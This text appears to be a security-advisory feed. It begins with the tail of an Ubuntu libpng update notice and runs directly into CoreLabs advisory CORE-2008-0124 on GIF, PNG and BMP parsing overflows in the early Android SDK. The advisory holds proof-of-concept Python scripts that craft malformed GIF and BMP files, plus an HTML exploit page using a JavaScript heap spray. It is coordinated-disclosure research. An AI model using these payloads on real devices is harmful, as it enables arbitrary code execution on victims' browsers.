http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_amd64.deb\n Size/MD5: 247528 68879285068cda170eef5a5f56594a1c\n\n i386 architecture (x86 compatible Intel/AMD)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_i386.udeb\n Size/MD5: 66932 12cafbea44a3e7cf109eb24cb47aa557\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_i386.deb\n Size/MD5: 111396 3a93335c2a072b2e2c94bc2cc0b3d77e\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_i386.deb\n Size/MD5: 239662 64029c30dac5152c97e1a0d864c981d0\n\n powerpc architecture (Apple Macintosh G3/G4/G5)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_powerpc.udeb\n Size/MD5: 66304 0cbf98391b6c3219f83cd24cefe0343c\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_powerpc.deb\n Size/MD5: 110828 62c7a8ccc58c86414bcd170c394f8240\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_powerpc.deb\n Size/MD5: 245220 1171c8638ec8ebc2c81f53706885b692\n\n sparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_sparc.udeb\n Size/MD5: 63824 e66313895e489a36c2f438343fa3e0d4\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_sparc.deb\n Size/MD5: 108534 73ccb876f761c76b3518b8ca81e80485\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_sparc.deb\n Size/MD5: 240048 5b19c41bbc639ee717fdacd4d81533e1\n\nUpdated packages for Ubuntu 6.10:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.diff.gz\n Size/MD5: 16597 4ff19b636ab120a3fc4cee767171aa4f\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.dsc\n Size/MD5: 659 5769690df3c57a56d08aa8bf11013a42\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz\n Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5.1ubuntu0.2_all.deb\n Size/MD5: 888 44f3267b52e89fc605f350b4fc347e45\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_amd64.udeb\n Size/MD5: 68992 105702504b783f464dff9ddd48de5ab0\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_amd64.deb\n Size/MD5: 113542 876f5c1a3a1f6b4bf828edcbabe0702e\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_amd64.deb\n Size/MD5: 247132 75d920fe60a5d4f356ccb43d8d5a98ed\n\n i386 architecture (x86 compatible Intel/AMD)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_i386.udeb\n Size/MD5: 69932 53783b0d13fd194f8cc9f19e1edc63d7\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_i386.deb\n Size/MD5: 114634 1b40abad309e133326ffdce859734610\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_i386.deb\n Size/MD5: 242882 3dca0a0938a43308465c8987f1357160\n\n powerpc architecture (Apple Macintosh G3/G4/G5)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_powerpc.udeb\n Size/MD5: 67606 088844733b580984e1a3b79001a27511\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_powerpc.deb\n Size/MD5: 112228 6024c0c9d455cfdaa8a38e89d6a53148\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_powerpc.deb\n Size/MD5: 246684 e45d2830ca5bdf0747ea0d436fafc20e\n\n sparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_sparc.udeb\n Size/MD5: 64656 55d6e7740ec8a9eddcbbfdada56a5f63\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_sparc.deb\n Size/MD5: 109396 0b522137b1f4b2a34f990efc9dbd81df\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_sparc.deb\n Size/MD5: 241064 e679e908623c68c5865fbf2c24c46973\n\nUpdated packages for Ubuntu 7.04:\n\n Source archives:\n\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.diff.gz\n Size/MD5: 14344 16526f313e1ee650074edd742304ec53\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.dsc\n Size/MD5: 819 b28af76731dfe368e48dfcd554d7b583\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz\n Size/MD5: 829038 77ca14fcee1f1f4daaaa28123bd0b22d\n\n Architecture independent packages:\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-1ubuntu1_all.deb\n Size/MD5: 936 dcec28b3cf4b8ee22c6a1229fdbd2e84\n\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_amd64.udeb\n Size/MD5: 70656 b4fa5b37b54fee32dd7404c64b696192\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_amd64.deb\n Size/MD5: 189594 7e36d8e73bd47dbb19afd7cd0099335a\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_amd64.deb\n Size/MD5: 179950 c575d8c9699c971ec7682e52e37590b7\n\n i386 architecture (x86 compatible Intel/AMD)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_i386.udeb\n Size/MD5: 68246 c81ffc4cd0359a1ce1e73eb99d8608f6\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_i386.deb\n Size/MD5: 187234 09dcea1e3394a6d25565b23774d805db\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_i386.deb\n Size/MD5: 171520 ac3fb45b36ec32b1bac4734eef162c49\n\n powerpc architecture (Apple Macintosh G3/G4/G5)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_powerpc.udeb\n Size/MD5: 70652 147c89e36570990d5e084fc3a8933ed2\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_powerpc.deb\n Size/MD5: 189548 00b81b16632e789ab20bab04dbcd586c\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_powerpc.deb\n Size/MD5: 179128 61c51aafc326420b202c0f2ce6d5abfd\n\n sparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_sparc.udeb\n Size/MD5: 66396 faff3d313cdc64f273eda1a5d01c2e0a\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_sparc.deb\n Size/MD5: 185312 249165d75936ab8cfc2fa1aef68a5ee6\n http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_sparc.deb\n Size/MD5: 173800 a40164cd4995c6ed795219157e6d598e\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - CoreLabs Advisory\n http://www.coresecurity.com/corelabs\n\nMultiple vulnerabilities in Google\u0027s Android SDK\n\n\n*Advisory Information*\n\nTitle: Multiple vulnerabilities in Google\u0027s Android SDK\nAdvisory ID: CORE-2008-0124\nAdvisory URL: http://www.coresecurity.com/?action=item\u0026id=2148\nDate published: 2008-03-04\nDate of last update: 2008-03-04\nVendors contacted: Google\nRelease mode: Coordinated release\n\n\n*Vulnerability Information*\n\nClass: Heap overflow, integer overflow\nRemotely Exploitable: No\nLocally Exploitable: No\nBugtraq ID: 28006, 28005\t\nCVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,\nCVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269\t\n\n\n*Vulnerability Description*\n\nAndroid is project promoted primarily by Google through the Open Handset\nAlliance aimed at providing a complete set of software for mobile\ndevices: an operating system, middleware and key mobile applications\n[1]. Although the project is currently in a development phase and has\nnot made an official release yet, several vendors of mobile chips have\nunveiled prototype phones built using development releases of the\nplatform at the Mobile World Congress [2]. Development using the Android\nplatform gained activity early in 2008 as a result of Google\u0027s launch of\nthe Android Development Challenge which includes $10 million USD in\nawards [3] for which a Software Development Kit (SDK) was made available\nin November 2007. \n\n The Android Software Development Kit includes a fully functional\noperating system, a set of core libraries, application development\nframeworks, a virtual machine for executing application and a phone\nemulator based on the QEMU emulator [4]. Public reports as of February\n27th, 2008 state that the Android SDK has been downloaded 750,000 times\nsince November 2007 [5]. \n\n Several vulnerabilities have been found in Android\u0027s core libraries for\nprocessing graphic content in some of the most used image formats (PNG,\nGIF an BMP). While some of these vulnerabilities stem from the use of\noutdated and vulnerable open source image processing libraries other\nwere introduced by native Android code that use them or that implements\nnew functionality. \n\n Exploitation of these vulnerabilities to yield complete control of a\nphone running the Android platform has been proved possible using the\nemulator included in the SDK, which emulates phone running the Android\nplatform on an ARM microprocessor. \n\n This advisory contains technical descriptions of these security bugs,\nincluding a proof of concept exploit to run arbitrary code, proving the\npossibility of running code on Android stack (over an ARM architecture)\nvia a binary exploit. \n\n\n\n\n*Vulnerable Packages*\n\n. Android SDK m3-rc37a and earlier are vulnerable several bugs in\ncomponents that process GIF, PNG and BMP images (bugs #1, #2 and #3 of\nthis advisory). Android SDK m5-rc14 is vulnerable to a security bug in the component\nthat process BMP images (bug #3). \n\n\n*Non-vulnerable Packages*\n\n. Android SDK m5-rc15\n\n\n*Vendor Information, Solutions and Workarounds*\n\nVendor statement:\n\n\"The current version of the Android SDK is an early look release to the\nopen source community, provided so that developers can begin working\nwith the platform to inform and shape our development of Android toward\nproduction readiness. The Open Handset Alliance welcomes input from the\nsecurity community throughout this process. There will be many changes\nand updates to the platform before Android is ready for end users,\nincluding a full security review.\"\n\n\n*Credits*\n\nThese vulnerabilities were discovered by Alfredo Ortega from Core\nSecurity Technologies, leading his Bugweek 2007 team called \"Pampa\nGrande\". It was researched in depth by Alfredo Ortega. \n\n\n*Technical Description / Proof of Concept Code*\n\nAndroid is a software stack for mobile devices that includes an\noperating system, middleware and key applications. Android relies on\nLinux version 2.6 for core system services such as security, memory\nmanagement, process management, network stack, and driver model. The\nkernel also acts as an abstraction layer between the hardware and the\nrest of the software stack. \n\n The WebKit application framework is included to facilitate development\nof web client application functionality. The framework in turn uses\ndifferent third-party open source libraries to implement processing of\nseveral image formats. \n\n Android includes a web browser based on the Webkit framework that\ncontains multiple binary vulnerabilities when processing .GIF, .PNG and\n.BMP image files, allowing malicious client-side attacks on the web\nbrowser. A client-side attack could be launched from a malicious web\nsite, hosting specially crafted content, with the possibility of\nexecuting arbitrary code on the victim\u0027s Android system. \n\n These client-side binary vulnerabilities were discovered using the\nAndroid SDK that includes an ARM architecture emulator. Binary\nvulnerabilities are the most common security bugs in computer software. \nBasic bibliography on these vulnerabilities includes a recently updated\nhandbook about security holes that also describes current\nstate-of-the-start exploitation techniques for different hardware\nplatforms and operating systems [6]. \n\n The vulnerabilities discovered are summarized below grouped by the type\nof image file format that is parsed by the vulnerable component. \n\n #1 - GIF image parsing heap overflow\n\nThe Graphics Interchange Format (GIF) is image format dating at least\nfrom 1989 [7]. It was popularized because GIF images can be compressed\nusing the Lempel-Ziv-Welch (LZW) compression technique thus reducing the\nmemory footprint and bandwidth required for transmission and storage. \n\n A memory corruption condition happens within the GIF processing library\nof the WebKit framework when the function \u0027GIFImageDecoder::onDecode()\u0027\nallocates a heap buffer based on the _Logical Screen Width and Height_\nfiled of the GIF header (offsets 6 and 8) and then the resulting buffer\nis filled in with an amount of data bytes that is calculated based on\nthe real Width and Height of the GIF image. There is a similar (if not\nthe same) bug in the function \u0027GIFImageDecoder::haveDecodedRow() \u0027in the\nopen-source version included by Android in\n\u0027WebKitLib\\WebKit\\WebCore\\platform\\image-decoders\\gif\\GifImageDecoder.cpp\u0027\ninside \u0027webkit-522-android-m3-rc20.tar.gz\u0027 available at [8]. \n\n Detailed analysis:\n\n When the process \u0027com.google.android.browser\u0027 must handle content with\na GIF file it loads a dynamic library called \u0027libsgl.so\u0027 which contains\nthe decoders for multiple image file formats. \n\n Decoding of the GIF image is performed correctly by the library giflib\n4.0 (compiled inside \u0027libsgl.so\u0027). However, the wrapper object\n\u0027GIFImageDecoder\u0027 miscalculates the total size of the image. \n\n First, the Logical Screen Size is read and stored in the following\ncalling sequence (As giflib is an Open Source MIT-licenced library, the\nsource was available for analysis):\n\u0027GIFImageDecoder::onDecode()-\u003eDGifOpen()-\u003eDGifGetScreenDesc()\u0027. The last\nfunction, \u0027DGifGetScreenDesc()\u0027, stores the _Logical Screen Width and\nHeight_ in a structure called \u0027GifFileType\u0027:\n\n/-----------\n\nInt DGifGetScreenDesc(GifFileType * GifFile) {\n... \n/* Put the screen descriptor into the file: */\nif (DGifGetWord(GifFile, \u0026GifFile-\u003eSWidth) == GIF_ERROR ||\nDGifGetWord(GifFile, \u0026GifFile-\u003eSHeight) == GIF_ERROR)\n return GIF_ERROR;\n ... \n }\n- -----------/\n\n We can see that the fields are stored in the first 2 words of the\nstructure:\n\n/-----------\n\ntypedef struct GifFileType {\n/* Screen dimensions. */\nGifWord SWidth, SHeight,\n... \n}\n- -----------/\n\n In the disassembly of the GIFImageDecoder::onDecode() function provided\nbelow we can see how the DGifOpen() function is called and that the\nreturn value (A GifFileType struct) is stored on the $R5 ARM register:\n\n/-----------\n\n.text:0002F234 BL _DGifOpen\n.text:0002F238 SUBS R5, R0, #0 ; GifFile -_ $R5\n- -----------/\n\n Then, the giflib function \u0027DGifSlurp()\u0027 is called and the Image size is\ncorrectly allocated using the Image Width and Height and not the Logical\nScreen Size:\n\n/-----------\n\nInt DGifSlurp(GifFileType * GifFile)\n{ ... ImageSize = sp-\u003eImageDesc.Width * sp-\u003eImageDesc.Height;\n sp-\u003eRasterBits = (unsigned char *)malloc(ImageSize *\nsizeof(GifPixelType));\n ... \n}\n- -----------/\n\n Afterwards the _Logical Screen_ Width and Height are stored in the R9\nand R11 registers:\n\n/-----------\n\n.text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight !\n- -----------/\n\n\n\n However the actual image may be much larger that these sizes that are\nincorrectly passed to a number of methods of the \u0027GIFImageDecoder\u0027:\n\n/-----------\n\nImageDecoder::chooseFromOneChoice():\n.text:0002F294 MOV R0, R8\n.text:0002F298 MOV R1, #3\n.text:0002F29C MOV R2, R9\n.text:0002F2A0 MOV R3, R11\n.text:0002F2A4 STR R12, [SP,#0x48+var_3C]\n.text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice;\nImageDecoder::chooseFromOneChoice(SkBitmap::Config,int\n,int)\n\nBitmap::setConfig():\n.text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap\n.text:0002F2BC MOV R1, #3\n.text:0002F2C0 MOV R2, R9 ; R9=SWidth R11=SHeight !\n.text:0002F2C4 MOV R3, R11\n.text:0002F2C8 STR R10, [SP,#0x48+var_48]\n.text:0002F2CC BL _Bitmap9setConfig ;\nBitmap::setConfig(SkBitmap::Config,uint,uint,uint)\n- -----------/\n\n This function stores the SWidth and SHeight inside the Bitmap object as\nshown in the following code snippet:\n\n/-----------\n\n.text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7\n.text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8\n.text:00035C40 MOV R4, R0 ; $R4 = *Bitmap\n- -----------/\n\n And later:\n\n/-----------\n\n.text:00035C58 BL _Bitmap15ComputeRowBytes ;\nSkBitmap::ComputeRowBytes(SkBitmap::Config,uint)\n.text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes\n.text:00035C68 STRH R7, [R4,#0x18] ; *Bitmap+0x18 = SWidth\n.text:00035C6C STRH R8, [R4,#0x1A] ; *Bitmap+0x1A = SHeight\n.text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes\n- -----------/\n\n The following python script generates a GIF file that causes the\noverflow. It requires the Python Imaging Library. Once generated the GIF\nfile, it must be opened in the Android browser to trigger the overflow:\n\n/-----------\n\n##Android Heap Overflow\n##Ortega Alfredo _ Core Security Exploit Writers Team\n##tested against Android SDK m3-rc37a\n\nimport Image\nimport struct\n\n#Creates a _good_ gif image\nimagename=\u0027overflow.gif\u0027\nstr = \u0027\\x00\\x00\\x00\\x00\u0027*30000\nim = Image.frombuffer(\u0027L\u0027,(len(str),1),str,\u0027raw\u0027,\u0027L\u0027,0,1)\nim.save(imagename,\u0027GIF\u0027)\n\n#Shrink the Logical screen dimension\nSWidth=1\nSHeight=1\n\nimg = open(imagename,\u0027rb\u0027).read()\nimg = img[:6]+struct.pack(\u0027\u003cHH\u0027,SWidth,SHeight)+img[10:]\n\n#Save the _bad_ gif image\nq=open(imagename,\u0027wb=\"\"\u0027)\nq.write(img)\nq.close()\n- -----------/\n\n This security bug affects Android SDK m3-rc37a and earlier versions. \nVersion m5-rc14 of the Android SDK includes a fix and is not vulnerable\nto this bug. \n\n #2 - PNG image parsing, multiple vulnerabilities:\n\n The Portable Network Graphics (PNG) is a bitmapped image format that\nemploys lossless data compression [9]. PNG was created to improve upon\nand replace the GIF format as an image file format that does not require\na patent license. The version\ninside libsgl.so distributed with Android SDK m3-rc37a and earlier\nversions include the string \u0027\"libpng version 1.2.8 - December 3, 2004\"\u0027. \nSource code inspection of the file\n\u0027\\WebKitLib\\WebKit\\WebCore\\platform\\image-decoders\\png\\png.c\u0027 included\nin the \u0027webkit-522-android-m3-rc20.tar.gz \u0027 release of the Android\nproject reveals that \u0027\"libpng version 1.2.7 - September\n 12, 2004\"\u0027 has been used in this release. \n\n This old version of libpng makes Android SDK m3-rc37a and earlier\nversions vulnerable to the following known issues: \u0027 CVE-2006-5793,\nCVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268,\nCVE-2007-5269 \u0027. \n\nAndroid version m5-rc14 has been updated to include libpng 1.2.24 and is\nlikely not vulnerable. \n\n #3 - BMP image processing, negative offset integer overflow:\n\n The BMP file format, sometimes called bitmap or DIB file format (for\ndevice-independent bitmap), is an image file format used to store bitmap\ndigital images, especially on Microsoft Windows and OS/2 operating\nsystems [10]. \n\n The integer overflow is caused when a Windows Bitmap file (.BMP) header\nis parsed in the method \u0027BMP::readFromStream(Stream *,\n ImageDecoder::Mode)\u0027 inside the \u0027libsgl.so\u0027 library. When the\nvalue of the \u0027offset\u0027 field of the BMP file header is negative and the\nBitmap Information section (DIB header) specifies an image of 8 bits per\npixel (8 bpp) the parser will try to allocate a palette, and will use\nthe negative offset to calculate the size of the palette. \n\n The following code initializes the palette with the color white\n(\u00270x00ffffff\u0027) but with a carefully chosen negative offset it can be\nmade to overwrite any address of the process with that value. Because\nthe BMP decoder source wasn\u0027t released, a disassembly of the binary\nincluded by Android is provided below:\n\n/-----------\n\n.text:0002EE38 MOV LR, R7 ; R7 is the negative offset\n.text:0002EE3C MOV R12, R7,LSL#2\n.text:0002EE40\n.text:0002EE40 loc_2EE40\n.text:0002EE40 LDR R3, [R10,#0x10]\n.text:0002EE44 ADD LR, LR, #1\n.text:0002EE48 MOVL R2, 0xFFFFFFFF\n.text:0002EE4C ADD R1, R12, R3 ; R3 is uninitialized (because of the\nsame bug) but ranges 0x10000-0x20000\n.text:0002EE50 MOV R0, #0\n.text:0002EE54 CMP LR, R9\n.text:0002EE58 STRB R2, [R12,R3] ;Write 0x00ffffff to R12+13 (equals R1)\n.text:0002EE5C STRB R2, [R1,#2]\n.text:0002EE60 STRB R0, [R1,#3]\n.text:0002EE64 STRB R2, [R1,#1]\n.text:0002EE68 ADD R12, R12, #4\n.text:0002EE6C BNE loc_2EE40\n- -----------/\n\n Now, if let\u0027s take a look at the memory map of the Android browser:\n\n/-----------\n\n# ps\nps\nUSER PID PPID VSIZE RSS WCHAN PC NAME\nroot 1 0 248 64 c0084edc 0000ae2c S /init\nroot 2 0 0 0 c0049168 00000000 S kthreadd\n... \nroot 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb\napp_0 1574 535 83564 12832 ffffffff afe0c79c S\ncom.google.android.browser\nroot 1600 587 840 324 00000000 afe0bfbc R ps\n# cat /proc/1574/maps\ncat /proc/1574/maps\n00008000-0000a000 rwxp 00000000 1f:00 514 /system/bin/app_process\n0000a000-00c73000 rwxp 0000a000 00:00 0 [heap]\n08000000-08001000 rw-s 00000000 00:08 344 /dev/zero (deleted)\n... \n#\n- -----------/\n\n We can see that the heap is located in the range \u00270000a000-00c73000\u0027\nand it is executable. Overwriting this area will allow to redirect\nexecution flow if there is a virtual table stored in the heap. Later on\nthe same method we can see that a call to the \"Stream\" Object VT is made:\n\n/-----------\n\n.text:0002EB64 LDR R12, [R8] # R8 is the \"this\" pointer of the Stream Object\n.text:0002EB68 MOV R0, R8\n.text:0002EB6C MOV LR, PC\n.text:0002EB70 LDR PC, [R12,#0x10] # A call is made to Stream+0x10\n- -----------/\n\n Because the \"Stream\" Object (R8) is stored on the heap and we can fill\nthe heap with the white color \u0027\n 0x00ffffff\u0027 we can load the Program Counter with the value at\n\u00270xffffff+0x10\u0027. The following python script will generate a BMP to\naccomplish that:\n\n/-----------\n\n# This script generates a Bitmap file that makes the Android browser\njump to the address at 0xffffff+0x10\n# Must be loaded inside a HTML file with a tag like this: \u0026lt;IMG\nsrc=badbmp.bmp\u0026gt;\n# Alfredo Ortega - Core Security\nimport struct\n\noffset = 0xffef0000\nwidth = 0x0bffff\nheight=8\n\nbmp =\"\\x42\\x4d\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\nbmp+=struct.pack(\"\u003cI\",offset)\nbmp+=\"\\x28\\x00\\x00\\x00\"\nbmp+=struct.pack(\"\u003cI\",width)\nbmp+=struct.pack(\"\u003cI\",height)\nbmp+=\"\\x03\\x00\\x08\\x00\\x00\\x00\"\nbmp+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\nbmp+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x55\\x02\\xff\\x00\\x02\\x00\\x02\\x02\\xff\"\nbmp+=\"\\xff\\x11\\xff\\x33\\xff\\x55\\xff\\x66\\xff\\x77\\xff\\x88\\x41\\x41\\x41\\x41\"\nbmp+=\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\nbmp+=\"\\x41\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\"\nbmp+=\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\"\nopen(\"badbmp.bmp\",\"wb\").write(bmp)\n- -----------/\n\n Opening the BMP file generated with this script inside a HTML page will\ncause (sometimes, as it is dependent on an uninitialized variable) the\nfollowing output of the gdb debugger:\n\n/-----------\n\n(gdb) attach 1574\nattach 1574\nAttaching to program: /system/bin/app_process, process 1574\n... \n0xafe0d204 in __futex_wait () from /system/lib/libc.so\n(gdb) c\nContinuing. \n\nProgram received signal SIGSEGV, Segmentation fault. \n0x00000000 in ?? ()\n(gdb)\n- -----------/\n\n Here the browser process has jumped to the \u00270x00000000\u0027 address because\nthat is the value at 0x00ffffff+0x10. We can change this value using\ncommon JavaScript heap-filling techniques. \n\n The complete exploit page follows:\n\n/-----------\n\n\u003cHTML\u003e\n\u003cHEAD\u003e\n\u003c/HEAD\u003e\n\u003cBODY\u003e\n\u003cscript type=\"text/javascript\"\u003e\n// Fill 0x200000 - 0xa00000 with Breakpoints\nvar nop = unescape(\"%u0001%uef9f\");\nwhile (nop.length \u003c= 0x100000/2) nop += nop;\nvar i = 0;\nfor (i = 0;i\u003c5;i++)\n document.write(nop)\n\n// Fill 0xa00000 - 0x1100000 with address 0x00400040\nvar nop = unescape(\"%u4000%u4000\");\nwhile (nop.length \u003c= 0x100000/2) nop += nop;\nvar i = 0;\nfor (i = 0;i\u003c2;i++)\n document.write(nop)\n\u003c/script\u003e\n\u003cIMG src=badbmp.bmp\u003e\n\u003c/BODY\u003e\n\u003c/HTML\u003e\n- -----------/\n\n Because the exploit needs to fill over 16 MB of heap memory to reach\nthe address \u00270xffffff\u0027 it is very slow and the default memory\nconfiguration of Android will often abort the process before reaching\nthe desired point. To overcome this limitation for demonstration\npurposes one can launch the emulator with this parameters:\n\n\u0027emulator -qemu -m 192\u0027\n\n That will launch the Android emulator with 192 megabytes of memory,\nplenty for the exploit to work. \n\n\n*Report Timeline*\n\n. 2008-01-30: Vendor is notified that possibly exploitable\nvulnerabilities where discovered and that an advisory draft is\navailable. 2008-01-30: Vendor acknowledges and requests the draft. 2008-01-31: Core sends the draft encrypted, including PoC code to\ngenerate malformed GIF images. 2008-01-31: Vendor acknowledges the draft. 2008-02-02: Vendor notifies that the software is an early release for\nthe open source community, but agree they can fix the problem on the\nestimated date (2008-02-25). 2008-02-04: Core notifies the vendor that Android is using a\nvulnerable PNG processing library. 2008-02-08: Vendor acknowledges, invites Core to send any new\nfindings and asks if all findings will be included in the advisory. 2008-02-12: Core responds to vendor that all security issues found\nwill be included in the advisory, the date is subject to coordination. 2008-02-12: Vendor releases version m5-rc14 of the Android SDK. Core\nreceives no notification. 2008-02-13: Core sends the vendor more malformed images, including\nGIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release. 2008-02-20: Core sends to the vendor a new version of the advisory,\nincluding a BMP PoC that runs arbitrary ARM code and informs the vendor\nthat we noticed that the recent m5-rc14 release fixed the GIF and PNG\nbugs. Publication of CORE-2008-0124 has been re-=scheduled for February\n27th. 2008. 2008-02-21: Vendor confirms that the GIF and PNG fixes have been\nreleased and provides an official statement to the \"Vendor Section\" of\nthe advisory. A final review of the advisory is requested before its\nrelease. The vendor indicates that the Android SDK is still in\ndevelopment and stabilization won\u0027t happen until it gets closer to\nAlpha. Changes to fix the BMP issue are coming soon, priorities are\ngiven to issues listed in the public issue tracking system at\nhttp://code.google.com/p/android/issues . 2008-02-26: Core indicates that publication of CORE-2008-0124 has\nbeen moved to March 3rd 2008, asks if an estimated date for the BMP fix\nis available and if Core should file the reported and any future bugs\nin the public issue tracking page. 2008-02-29: Final draft version of advisory CORE-2008-0124 is sent to\nthe vendor as requested. Core requests for any additional comments or\nstatements to be provided by noon March 3rd, 2008 (UTC-5)\n. 2008-03-01: Vendor requests publication to be delayed one day in\norder to publish a new release of Android with a fix to the BMP issue. 2008-03-02: Core agrees to delay publication for one day. 2008-03-03: Vendor releases Android SDK m5-rc15 which fixes the BMP\nvulnerability. Vendor indicates that Android applications run with\nthe credentials of an unprivileged user which decreases the severity of\nthe issues found\n. 2008-03-04: Further research by Alfredo Ortega reveals that although\nthe vendor statement is correct current versions of Android SDK ship\nwith a passwordless root account. Unprivileged users with shell access\ncan simply use the \u0027su\u0027 program to gain privileges\n. 2008-03-04: Advisory CORE-2008-0124 is published. \n\n\n*References*\n\n[1] Android Overview - Open Handset Alliance -\nhttp://www.openhandsetalliance.com/android_overview.html\n[2] \"Android Comes to Life in Barcelona\" - The Washington Post ,\nFebruary 11th, 2008 -\nhttp://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/AR2008021101944.html\n[3] Android Developer Challenge - http://code.google.com/android/adc.html\n[4] \"Test Center Preview: Inside Google\u0027s Mobile future\" - Inforworld,\nFeb. 27th 2008 -\nhttp://www.infoworld.com/article/08/02/27/09TC-google-android_1.html\n[5] \"\u0027Allo, \u0027allo, Android\" - The Sydney Morning Herald, February 